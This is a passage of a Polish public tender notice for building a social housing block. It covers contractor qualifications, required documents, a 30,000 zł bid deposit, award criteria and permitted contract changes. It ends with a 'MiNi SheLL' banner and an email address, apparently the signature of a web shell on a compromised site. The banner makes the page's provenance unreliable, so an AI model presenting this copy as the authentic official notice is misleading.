       Kierownikiem robót lub majstrem robót 
         -  posiadającym uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez   ograniczeń  zgodne z przepisami ustawy z 07.07.1994 r. Prawo budowlane (t. j. Dz.U. z 2016 r. poz.290) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów  lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r. poz.65), 
                        -  mającym co najmniej 12miesięczne doświadczenie zawodowe nabyte podczas pełnienia funkcji  kierownika budowy; kierownika robot lub majstra budowy       

                        Kierownikiem robót lub majstrem robót,  
   - posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności 
            instalacyjnej w zakresie sieci,  instalacji i urządzeń elektrycznych i elektroenergetycznych bez   ograniczeń  zgodne z przepisami ustawy z 07.07.1994 r. Prawo budowlane (t. j. Dz.U. z 2016 r. poz.290) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów  lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej,           z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r. poz.65), z wyłączeniem sieci 
                        -  mającym co najmniej 12miesięczne doświadczenie zawodowe nabyte podczas pełnienia funkcji  kierownika budowy; kierownika robót lub majstra budowy.      

Zamawiający dopuszcza posiadanie uprawnień w ww. branżach przez jedną, dwie lub trzy osoby pod warunkiem, że zostaną odpowiednio wskazane do pełnienia funkcji zgodnie z  zakresem odpowiadającym ich uprawnieniom.
              c2)  wymagane jest od wykonawcy należyte zrealizowanie nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- to w tym czasie, co najmniej jednej roboty budowlanej polegającej na budowie budynków z drewnianą więźbą dachową i pokryciem blachą, z ocieplonymi ścianami zewnętrznymi i elewacją, instalacjami wewnętrznymi (elektryczną, wodociągową i kanalizacyjną),  z wyłączeniem: odbudowy, rozbudowy oraz nadbudowy.  

Przez pojęcie, zgodnie z ustawą Prawo budowlane, należy rozumieć :
  budowa  należy rozumieć wykonywanie obiektu budowlanego w określonym miejscu, po                    uwzględnieniu ww. wyłączenia, 
                          budynek - należy rozumieć taki obiekt budowlany, który jest trwale związany z gruntem, wydzielony  z przestrzeni  za pomocą przegród budowlanych oraz posiada fundament i dach.
  obiekt budowlany  należy przez to rozumieć budynek wraz z instalacjami i urządzeniami technicznymi.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawca może, w celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa  wyżej              w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części,  polegać na zdolnościach technicznych lub zawodowych Podmiotu udostępniającego, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
 Stosowna sytuacja, o której mowa   wystąpi wyłącznie w przypadku kiedy:
              
a)	wykonawca, który polega na zdolnościach technicznych lub zawodowych  innych podmiotów udowodni  Zamawiającemu, że realizując zamówienie, będzie dysponował  niezbędnymi zasobami tych  podmiotów,  w szczególności przedstawiając zobowiązanie  tych podmiotów  do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
Zobowiązanie musi mieć formę pisemną,  być  dołączone do oferty w oryginale i być podpisane przez Podmiot udostępniający zasoby.
b)	 Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne, zawodowe  pozwalają na wykazanie przez wykonawcę spełnienia warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,   o których mowa w art.24 ust.1 pkt 13-22, 
c)	 w odniesieniu  do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia              wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty/usługi, do realizacji których te zdolności są wymagane,
d)	z zobowiązania Podmiotu udostępniającego zasoby lub innych dokumentów potwierdzających udostępnianie zasobów musi bezspornie i jednoznacznie  wynikać w szczególności:

-    zakres dostępnych wykonawcy zasobów innego podmiotu,
- sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
-  zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,
-  czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału 
   w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje  
   roboty/ usługi, których wskazane zdolności dotyczą,
e)	jeżeli zdolności techniczne lub zawodowe  Podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez wykonawcę warunków udziału  w postępowaniu lub zachodzą wobec niego podstawy wykluczenia, Zamawiający żądać będzie, aby wykonawca  w określonym terminie zastąpił ten Podmiot innym podmiotem lub zobowiązał się do osobistego wykonania odpowiedniego zakresu zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe  o których mowa w warunku udziału w postępowaniu.
      </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W terminie 3 dni od dnia przekazania, na stronie internetowej Zamawiającego, informacji z otwarcia ofert,                          o której mowa w art.86 ust.5 upzp., wykonawca musi przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej - wg wzoru stanowiącego Załącznik  nr 7.
        Wraz  z oświadczeniem, wykonawca może przedstawić  dowody, że powiązania z innym wykonawcą/mi  nie  prowadzą  do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />-  dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć ww. dokumentu, dopuszcza się złożenie innych dokumentów , które w wystarczający sposób potwierdzą spełnienie tego warunku.
-  informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość  posiadanych środków finansowych lub zdolność kredytową wykonawcy , w okresie nie wcześniejszym niż 1 miesiąc przed upływem  terminu składania ofert
-  wykaz osób (wszystkich) skierowanych przez wykonawcę do realizacji zamówienia publicznego,                 w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego,  a także zakresu wykonywanych przez nie czynności oraz informacją                    o podstawie dysponowania osobami 
-  wykaz robót  budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz                z podaniem  ich rodzaju    wartości, daty i miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane z załączeniem dowodów określających, czy te roboty budowlane  zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są  referencje bądź inne dokument wystawione przez podmiot na rzecz którego roboty budowlane były wykonywane, a jeżeli        z uzasadnionej przyczyny   o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów- inne dokumenty.  W oświadczeniu wykonawca jest zobowiązany do podania tych przyczyn o obiektywnym charakterze .
         


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie ma szczególnych wymagań</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	 Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium, w kwocie  30 000zł
 (słownie: trzydzieści tysięcy złotych i 00/100).
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że       
  poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	 gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z   09.11.2000 r.               o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2014 r. poz.1804   z późn.zm.) 

3.	 Polisa, gwarancja, poręczenie  lub inny dokument stanowiący formę wadium winno  zawierać  stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami SIWZ,  następuje jego bezwarunkowa wypłata w pełnej wysokości bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.
Koniecznym jest, żeby dokument ten obejmował  odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust.4a i 5 upzp.

4.	Wadium wnoszone w pieniądzu należy wpłacić - przelewem na rachunek Zamawiającego,  otwarty  w  PLN : 
nr konta:  Bank Zachodni WBK S.A. 1 Oddział  w Szklarskiej Porębie -  nr 68 1090 1984 0000 0001 0081 6338 ,      z adnotacją w tytule wpłaty :  Wadium  budynek socjalny_ III 2017.

5.  W przypadku wnoszenia wadium w innej formie niż pieniężna- wykonawca dołącza do oferty oryginalny dokument wadialny. Wniesione wadium  w takiej formie winno obowiązywać od dnia składania oferty ( a nie od dnia następnego) przez cały okres związania ofertą zgodnie z art.85 upzp, 
  
6.   Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego, Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew najpóźniej przed upływem terminu składania ofert. Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym  warunkiem do stwierdzenia terminowego wniesienia wadium przez wykonawcę. 

7.  W przypadku, kiedy wnoszone wadium w postaci gwarancji bankowych bądź ubezpieczeniowych  dotyczy zabezpieczenia oferty składanej  przez wykonawców ubiegających się wspólnie o udzielenie zamówienia               w treści  gwarancji bankowych bądź ubezpieczeniowych  muszą znajdować się wszystkie podmioty (członkowie konsorcjum, wspólnicy spółki cywilnej, partnerzy spółki joint venture) wymienieni jako wykonawcy.

8.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46  ust.1 do ust.4 upzp.






9.  Zamawiający zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  Wykonawca w  odpowiedzi  na wezwanie,  o którym  mowa w art.26 ust.3 i ust.3a upzp., z przyczyn leżących po jego stronie, nie złożył oświadczeń lub  dokumentów  potwierdzających okoliczności, których mowa w art.25 ust.1 upzp., oświadczenia, o którym mowa w art. 25a ust.1, pełnomocnictw lub nie wyraził zgody na  poprawienie omyłki, o której mowa w art.87 ust.2 pkt.3 [patrz: punkt XI.5 c) i d) ], co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.           

10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
 a)    odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,  
 b)    nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
 c)     zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po  
   stronie wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />nie dotyczy- przetarg nieograniczony </div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Umowna cena</td><td>60</td></tr><tr><td>Termin realizacji  (T)  - za skrócenie terminu zakończenia zakresu rzeczowego zamówienia minimum do 31.07.2018 r. (włącznie) </td><td>20</td></tr><tr><td>Kary umowne (K)   -  za podniesienie kar umownych z tytułu nieterminowej realizacji zamówienia     o minimum 500zł za każdy dzień zwłoki  - 5%= 5,00pkt ,   ale max. 20,00 pkt</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :
  1.1   zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Części. I IDW,

  1.2    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy  podwykonawcy lub dalszego podwykonawcy,
  1.3  rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz z jednoczesnym związanym  z tym obniżeniem wynagrodzenia, w oparciu o dostarczony przed podpisaniem umowy  kosztorys ofertowy lub kalkulację wyceny, 

1.4	 wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w  trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany                         w Dokumentacji projektowej, nie powodujących zmiany umownej ceny,

1.5	    wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych (siła wyższa) uniemożliwiających wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach,

1.6	   konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych, technologicznych            lub materiałowych niż wskazane w Dokumentacji projektowej  w sytuacji,  gdyby zastosowanie dotychczasowych rozwiązań groziło nie wykonaniem lub wadliwym  wykonaniem projektu  dotyczy możliwości  wydłużenia cyklu realizacji i/lub zmiany wynagrodzenia na zasadach określonych                    w punktach  1.3,  1.4, 



<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/04/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com